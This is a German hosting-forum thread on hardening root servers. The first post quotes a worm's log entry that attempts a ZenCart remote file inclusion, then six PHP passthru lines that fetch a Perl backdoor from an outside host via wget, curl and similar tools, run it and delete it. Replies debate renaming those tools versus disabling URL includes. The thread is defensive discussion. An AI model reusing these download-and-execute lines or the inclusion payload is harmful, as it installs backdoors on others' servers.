Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 13

  1. Beiträge
    4.712
    Registriert seit
    20.05.2000
    Alter
    41
    Redaktion

    Root-Server: Sicherheit Scripte

    Hier ein kleiner Tipp, um es webbasierten Angreifern etwas schwerer zu machen.

    Dieser Tipp ersetzt nicht die normalen weitergehenden Absicherungen eines Webservers, sondern ist zusätzlich zu verstehen.

    Von dem ersten Moment an, an dem der Server im Netz ist, wird er von Würmern und Bots angegriffen. Ein typischer Angriff kann so aussehen:

    Code:
    202.180.216.12 - - [05/Jan/2008:10:19:58 +0100] "GET /forum/smalltalk/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 301 - "-" "libwww-perl/5.805"
    Hier versucht ein Wurm von der IP 202.180.216.12 eine Lücke im ZenCart auszunutzen (egal, ob es installiert ist oder nicht - es werden einfach alle Server mit vielen Lücken ausprobiert.)

    Bei Erfolg wird eine Datei nachgeladen, die wiederrum versucht eine Backdoor zu installieren. Dabei versucht das angreifende Script, verschiedenen Schadcode nachzuladen:

    Code:
    @passthru('cd /tmp;wget http://freewebs.com/yuonme/indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
    @passthru('cd /tmp;curl -O http://freewebs.com/yuonme/indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
    @passthru('cd /tmp;lwp-download http://freewebs.com/yuonme/indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
    @passthru('cd /tmp;lynx -source http://freewebs.com/yuonme/indo_3.txt >indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
    @passthru('cd /tmp;fetch http://freewebs.com/yuonme/indo_3.txt > indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
    @passthru('cd /tmp;GET http://freewebs.com/yuonme/indo_3.txt > indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
    Wie man sehen kann versucht dieser Wurm verschiedene typische Nachlade-Programme wie wget, curl, etc. zu nutzen.


    Tipp:
    Wenn Ihr es nicht unbedingt anders braucht, benennt einfach diese typischen Lade-Programme um, so dass ein Wurm sie nicht mehr finden kann. Das verhindert zwar nicht einen Einbruch um jeden Preis, macht es aber automatischen Angreifern schwerer.


  2. Registrieren, damit diese Werbung verschwindet.

  3. Beiträge
    53
    Registriert seit
    06.01.2008
    Benutzer

    AW: Root-Server: Sicherheit Scripte

    kannst du auch noch kurz erklären wie man die umbennt?

    Vielen Dank
    shadyfan


  4. Beiträge
    361
    Registriert seit
    09.02.2006
    Ort
    Lübeck
    Erfahrener Benutzer

    AW: Root-Server: Sicherheit Scripte

    Zitat Zitat von shadyfan Beitrag anzeigen
    kannst du auch noch kurz erklären wie man die umbennt?
    Linux: mv alter_name neuer_name
    ;)

    Beispiel:
    mv wget w_get


  5. Beiträge
    1.062
    Registriert seit
    24.03.2004

    HosterME.de

    Provider

    AW: Root-Server: Sicherheit Scripte

    Das ist ziemlich großer Quatsch:
    1. Einige gutartige Programme, z.B. apt-get laufen dann auch nicht mehr.
    2. Nach einem Update würden die executables irgendwann wieder ersetzt werden.
    Würde von einer solchen Lösung daher absehen.

    Bessere Empfehlung: mod_security, allow_url_fopen off, und einiges mehr - gibt genug Howtos
    Geändert von HosterME.de (08.01.2008 um 17:05 Uhr)


  6. Beiträge
    1.130
    Registriert seit
    02.04.2006
    Ort
    Paderborn

    Ameus GmbH

    Provider

    AW: Root-Server: Sicherheit Scripte

    security by obscurity? ;-)
    Ameus GmbH - Managed Server & Hochverfügbarkeitslösungen seit 1999
    Zertifiziert als Linux Certified Solution Partner und Microsoft Hosting Partner
    www.ameus.de - Tel: 05251/1480720

  7. XnS
    XnS ist offline

    Beiträge
    534
    Registriert seit
    15.01.2008
    Ort
    Stuttgart
    Vielschreiber

    AW: Root-Server: Sicherheit Scripte

    Zitat Zitat von HosterME.de Beitrag anzeigen
    Das ist ziemlich großer Quatsch:
    1. Einige gutartige Programme, z.B. apt-get laufen dann auch nicht mehr.
    2. Nach einem Update würden die executables irgendwann wieder ersetzt werden.
    Würde von einer solchen Lösung daher absehen.

    Bessere Empfehlung: mod_security, allow_url_fopen off, und einiges mehr - gibt genug Howtos
    Die meisten Web-Applikationen die über APT geladen werden koennen, landen nicht direkt im Web-Root. Daher ist es hier recht einfach, einen symbolischen Link mit anderem Namen auf die Applikation zu erstellen. Die Punkte 1 und 2 haben sich somit erledigt.


  8. Beiträge
    1.062
    Registriert seit
    24.03.2004

    HosterME.de

    Provider

    AW: Root-Server: Sicherheit Scripte

    Ich verstehe den vorherigen Punkt nicht - das hat nichts mit web-root o.ä. zu tun. apt benutzt andere Programme um Updates herunterzuladen. Wenn diese anders heißen funktioniert apt-get update/upgrade nicht mehr... Bei vielen anderen Tools ist es genauso.


  9. Beiträge
    1.130
    Registriert seit
    02.04.2006
    Ort
    Paderborn

    Ameus GmbH

    Provider

    AW: Root-Server: Sicherheit Scripte

    Zitat Zitat von HosterME.de Beitrag anzeigen
    Ich verstehe den vorherigen Punkt nicht - das hat nichts mit web-root o.ä. zu tun. apt benutzt andere Programme um Updates herunterzuladen. Wenn diese anders heißen funktioniert apt-get update/upgrade nicht mehr... Bei vielen anderen Tools ist es genauso.
    Ich glaube das liegt ein Missverständnis vor. Carsten sprach von einem umbenennen der URLs (von extern) und nicht vom Umbenennen von Programmen auf dem System.
    Ameus GmbH - Managed Server & Hochverfügbarkeitslösungen seit 1999
    Zertifiziert als Linux Certified Solution Partner und Microsoft Hosting Partner
    www.ameus.de - Tel: 05251/1480720


  10. Beiträge
    6
    Registriert seit
    23.05.2008
    Ort
    Paderborn

    Ameus GmbH

    Provider

    AW: Root-Server: Sicherheit Scripte

    Zitat Zitat von ameus Beitrag anzeigen
    Ich glaube das liegt ein Missverständnis vor. Carsten sprach von einem umbenennen der URLs (von extern) und nicht vom Umbenennen von Programmen auf dem System.
    Ich glaube schon, dass er damit meinte, typische Programme zum herunterladen umzubennen (curl, lynx, wget etc.).
    Mal davon abgesehen, dass dann jeder Benutzer auf dem System die neuen Programmnamen benutzen müsste wurde ja schon angesprochen, dass man dies nach jedem Upgrade des Pakets wieder erneut ausführen müsste, somit ein sc.. Aufwand.

    Das Problem wird hier einfach an der falschen Stelle angepackt. Wenn ein Angreifer schon soweit kommt, dass er executen kann, dann sollte man die Webapplikation (oder auch Webserver wenn der zB schuldig ist) versuchen zu fixxen, nicht sein eigenes System kaputtmachen.
    Curl und wget zum Beispiel wird bei manchen Maintainer Skripten bei Debian benutzt - die Installationen der Pakete würden zwangsläufig fehlschlagen.

    Ein gutes Workaround wäre einfach wie auch schon vorgeschlagen, url_include und url_fopen zu deaktivieren. mod_security würde an der Stelle an sich zwar auch gut ansetzen (exec verbieten) - aber mod_security ist selber kaputt - daher doof.


  11. Beiträge
    1.911
    Registriert seit
    11.12.2000
    Ort
    FFM
    Alter
    47

    Concept 69

    Gepruefter Provider

    AW: Root-Server: Sicherheit Scripte

    Zitat Zitat von pmatthaei Beitrag anzeigen
    Wenn ein Angreifer schon soweit kommt, dass er executen kann, dann sollte man die Webapplikation (oder auch Webserver wenn der zB schuldig ist) versuchen zu fixxen, nicht sein eigenes System kaputtmachen.
    Ist es dann nicht schon ein gaaanz klitzekleines bisschen zu spät? ;)

Seite 1 von 2 12 LetzteLetzte

Ähnliche Themen

  1. V-Server SSL, Sicherheit usw. Kosten ?
    Von Romeo75 im Forum Webserver (Software): Linux, Unix, etc.
    Antworten: 7
    Letzter Beitrag: 12.10.2007, 23:59
  2. Sicherheit Root-Server mit Windows
    Von lugdidux im Forum Webserver (Software): Windows
    Antworten: 7
    Letzter Beitrag: 19.03.2007, 12:46
  3. Windows Server Sicherheit
    Von thekingofqueens im Forum Einsteiger
    Antworten: 1
    Letzter Beitrag: 19.03.2007, 12:40
  4. Silverline-Server setzt auf Sicherheit
    Von silverline-server im Forum Pressemitteilungen
    Antworten: 2
    Letzter Beitrag: 09.12.2005, 17:34
  5. [ERLEDIGT] Was laufen den für Scripte auf diesem Server?
    Von Gast im Forum Script Serverseitig
    Antworten: 1
    Letzter Beitrag: 25.09.2000, 00:18

Content Relevant URLs by vBSEO 3.6.0